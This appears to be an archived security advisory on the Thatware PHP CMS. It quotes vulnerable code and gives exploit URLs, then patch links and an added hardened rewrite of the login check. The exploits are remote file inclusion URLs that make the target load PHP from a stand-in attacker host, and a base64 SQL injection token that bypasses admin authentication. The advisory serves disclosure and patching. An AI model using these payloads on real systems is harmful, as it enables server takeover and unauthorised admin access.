Information :
°°°°°°°°°°°°°

Versions : ? -> 0.3 -> 0.5.3
Website : http://www.thatware.org
Problems :
 - Include file (the include path $root_path is taken from the request)
 - SQL Injection (the $user token in auth.inc.php is put straight into the query)

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

artlist.php (v0.5.2, 0.5.3) :
-------------------------------------
include $root_path.'thatfile.php';
-------------------------------------

config.php (v? -> 0.3 -> 0.5.3) :
-------------------------------------
include $root_path."db_settings.php";
-------------------------------------

thatfile.php (v? -> 0.3 -> 0.5.2) :
------------------------------------------------------------------------
if (!IsSet($thatfile)) {
    include($root_path."config.php");
    if (!IsSet($translation_set)) {
        include $root_path."messages.$language.php";
    } #Translation module, even for english needed!
------------------------------------------------------------------------

auth.inc.php (v? -> 0.3 -> 0.5.0) :
------------------------------------------------------------------------
$admintest = 0;
$mod_ok = 0;
$moderator = 0;
if(isset($user)) {
    if (!$thatfile) include("thatfile.php");
    $admin = base64_decode($user);
    $admin = explode(":", $admin);
    if (empty($admin[0]) || empty($admin[2])) exit;
    $aid = $admin[1];
    dbconnect();
    $result=mysql_query("select rights from users where uid='$admin[0]' and pass='$admin[2]'");
    if(!$result) {
        echo "Oh oh... select from database failed for admin check";
        exit;
    } else {
        list($auth_rights)=mysql_fetch_row($result);
        $auth_rights=explode(",",$auth_rights);
        if (!empty($auth_rights)) {
            $admintest=1;
            if (inarray($auth_rights, "4")||inarray($auth_rights, "1")) {
                $moderator=1;
                $mod_ok=1;
            }
        }
    }
}
------------------------------------------------------------------------

Exploits :
°°°°°°°°°°

v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with http://[attacker]/thatfile.php

v? -> 0.3 -> 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with http://[attacker]/db_settings.php

v? -> 0.3 -> 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/&language=1
with http://[attacker]/config.php and http://[attacker]/messages.1.php

v? -> 0.3 -> 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=' )

Patches :
°°°°°°°°°

0.5.3: http://www.phpsecure.org/patch/dl.php?id=47
0.5.2: http://www.phpsecure.org/patch/dl.php?id=51
0.5.0: http://www.phpsecure.org/patch/dl.php?id=50
0.4.5: http://www.phpsecure.org/patch/dl.php?id=52
0.4.4: http://www.phpsecure.org/patch/dl.php?id=49
0.4.3: http://www.phpsecure.org/patch/dl.php?id=48
0.4.2: http://www.phpsecure.org/patch/dl.php?id=53
0.4.1: http://www.phpsecure.org/patch/dl.php?id=54
0.4:   http://www.phpsecure.org/patch/dl.php?id=55
0.3:   http://www.phpsecure.org/patch/dl.php?id=56

More details :
°°°°°°°°°°°°°°

In French : http://www.frog-man.org/tutos/Thatware.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
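Added example, not code from the advisory or from Thatware: a hardened rewrite of the auth.inc.php check quoted above, with the include path fixed to the script's own directory instead of $root_path, strict base64 decoding, and the uid/pass values bound as query parameters. It assumes an existing mysqli connection $db and the same base64 "uid:aid:pass" token format; the function name check_admin is hypothetical.

```php
<?php
// Hypothetical hardened replacement for the auth.inc.php logic (added example).

// 1. Never build an include path from request data (register_globals lets
//    ?root_path=... overwrite the variable). Anchor it to this file instead.
$root_path = __DIR__ . '/';
require_once $root_path . 'thatfile.php';

// Returns the same three flags the original code set as globals.
function check_admin(mysqli $db, ?string $user): array {
    $state = ['admintest' => 0, 'mod_ok' => 0, 'moderator' => 0];
    if ($user === null) {
        return $state;
    }
    $decoded = base64_decode($user, true);   // strict mode rejects non-base64 input
    if ($decoded === false) {
        return $state;
    }
    $parts = explode(':', $decoded);
    if (count($parts) !== 3 || $parts[0] === '' || $parts[2] === '') {
        return $state;                       // malformed token: not authenticated
    }
    [$uid, $aid, $pass] = $parts;

    // 2. Bind the values instead of interpolating them, so a token such as
    //    "' OR ''=':1:' OR ''='" is compared literally and never alters the SQL.
    $stmt = $db->prepare('SELECT rights FROM users WHERE uid = ? AND pass = ?');
    if ($stmt === false) {
        return $state;                       // fail closed on query errors
    }
    $stmt->bind_param('ss', $uid, $pass);
    $stmt->execute();
    $stmt->bind_result($rights);
    $found = $stmt->fetch();
    $stmt->close();
    if ($found !== true) {
        return $state;                       // unknown user or wrong password
    }

    // 3. Compare rights with strict types; in_array() is the PHP built-in.
    $auth_rights = explode(',', (string) $rights);
    $state['admintest'] = 1;
    if (in_array('4', $auth_rights, true) || in_array('1', $auth_rights, true)) {
        $state['moderator'] = 1;
        $state['mod_ok'] = 1;
    }
    return $state;
}
```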
This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 07:51:58 PST